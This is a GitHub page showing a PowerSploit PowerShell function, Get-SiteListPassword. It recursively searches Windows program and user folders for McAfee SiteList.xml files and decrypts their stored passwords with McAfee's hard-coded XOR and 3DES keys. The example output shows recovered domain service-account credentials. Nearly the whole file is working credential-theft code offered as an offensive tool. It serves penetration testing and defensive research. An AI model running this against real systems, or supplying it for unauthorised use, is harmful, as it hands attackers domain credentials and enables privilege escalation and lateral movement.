Skip to content
Permalink
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
179 lines (148 sloc) 6.15 KB
function Get-SiteListPassword {
<#
.SYNOPSIS
Retrieves the plaintext passwords for found McAfee's SiteList.xml files.
Based on Jerome Nokin (@funoverip)'s Python solution (in links).
PowerSploit Function: Get-SiteListPassword
Original Author: Jerome Nokin (@funoverip)
PowerShell Port: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.PARAMETER SiteListFilePath
Optional path to a SiteList.xml file.
.EXAMPLE
PS C:\> Get-SiteListPassword
EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
UserName :
Path : Products/CommonUpdater
Name : McAfeeHttp
DecPassword : MyStrongPassword!
Enabled : 1
DomainName :
Server : update.nai.com:80
EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
UserName : McAfeeService
Path : Repository$
Name : Paris
DecPassword : MyStrongPassword!
Enabled : 1
DomainName : companydomain
Server : paris001
EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
UserName : McAfeeService
Path : Repository$
Name : Tokyo
DecPassword : MyStrongPassword!
Enabled : 1
DomainName : companydomain
Server : tokyo000
.LINK
https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
#>
[CmdletBinding()]
param(
[ValidateScript({Test-Path -Path $_ })]
[String]
$SiteListFilePath
)
function Get-DecryptedSitelistPassword {
# PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
# Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com)
# port by @harmj0y
[CmdletBinding()]
Param (
[Parameter(Mandatory = $True)]
[String]
$B64Pass
)
# make sure the appropriate assemblies are loaded
Add-Type -assembly System.Security
Add-Type -assembly System.Core
# declare the encoding/crypto providers we need
$Encoding = [System.Text.Encoding]::ASCII
$SHA1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider
$3DES = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider
# static McAfee key XOR key LOL
$XORKey = 0x12,0x15,0x0F,0x10,0x11,0x1C,0x1A,0x06,0x0A,0x1F,0x1B,0x18,0x17,0x16,0x05,0x19
# xor the input b64 string with the static XOR key
$I = 0;
$UnXored = [System.Convert]::FromBase64String($B64Pass) | Foreach-Object { $_ -BXor $XORKey[$I++ % $XORKey.Length] }
# build the static McAfee 3DES key TROLOL
$3DESKey = $SHA1.ComputeHash($Encoding.GetBytes('<!@#$%^>')) + ,0x00*4
# set the options we need
$3DES.Mode = 'ECB'
$3DES.Padding = 'None'
$3DES.Key = $3DESKey
# decrypt the unXor'ed block
$Decrypted = $3DES.CreateDecryptor().TransformFinalBlock($UnXored, 0, $UnXored.Length)
# ignore the padding for the result
$Index = [Array]::IndexOf($Decrypted, [Byte]0)
if($Index -ne -1) {
$DecryptedPass = $Encoding.GetString($Decrypted[0..($Index-1)])
}
else {
$DecryptedPass = $Encoding.GetString($Decrypted)
}
New-Object -TypeName PSObject -Property @{'Encrypted'=$B64Pass;'Decrypted'=$DecryptedPass}
}
function Get-SitelistFields {
[CmdletBinding()]
Param (
[Parameter(Mandatory = $True)]
[String]
$Path
)
try {
[Xml]$SiteListXml = Get-Content -Path $Path
if($SiteListXml.InnerXml -Like "*password*") {
Write-Verbose "Potential password in found in $Path"
$SiteListXml.SiteLists.SiteList.ChildNodes | Foreach-Object {
try {
$PasswordRaw = $_.Password.'#Text'
if($_.Password.Encrypted -eq 1) {
# decrypt the base64 password if it's marked as encrypted
$DecPassword = if($PasswordRaw) { (Get-DecryptedSitelistPassword -B64Pass $PasswordRaw).Decrypted } else {''}
}
else {
$DecPassword = $PasswordRaw
}
$Server = if($_.ServerIP) { $_.ServerIP } else { $_.Server }
$Path = if($_.ShareName) { $_.ShareName } else { $_.RelativePath }
$ObjectProperties = @{
'Name' = $_.Name;
'Enabled' = $_.Enabled;
'Server' = $Server;
'Path' = $Path;
'DomainName' = $_.DomainName;
'UserName' = $_.UserName;
'EncPassword' = $PasswordRaw;
'DecPassword' = $DecPassword;
}
New-Object -TypeName PSObject -Property $ObjectProperties
}
catch {
Write-Debug "Error parsing node : $_"
}
}
}
}
catch {
Write-Error $_
}
}
if($SiteListFilePath) {
$XmlFiles = Get-ChildItem -Path $SiteListFilePath
}
else {
$XmlFiles = 'C:\Program Files\','C:\Program Files (x86)\','C:\Documents and Settings\','C:\Users\' | Foreach-Object {
Get-ChildItem -Path $_ -Recurse -Include 'SiteList.xml' -ErrorAction SilentlyContinue
}
}
$XmlFiles | Where-Object { $_ } | Foreach-Object {
Write-Verbose "Parsing SiteList.xml file '$($_.Fullname)'"
Get-SitelistFields -Path $_.Fullname
}
}
You can’t perform that action at this time.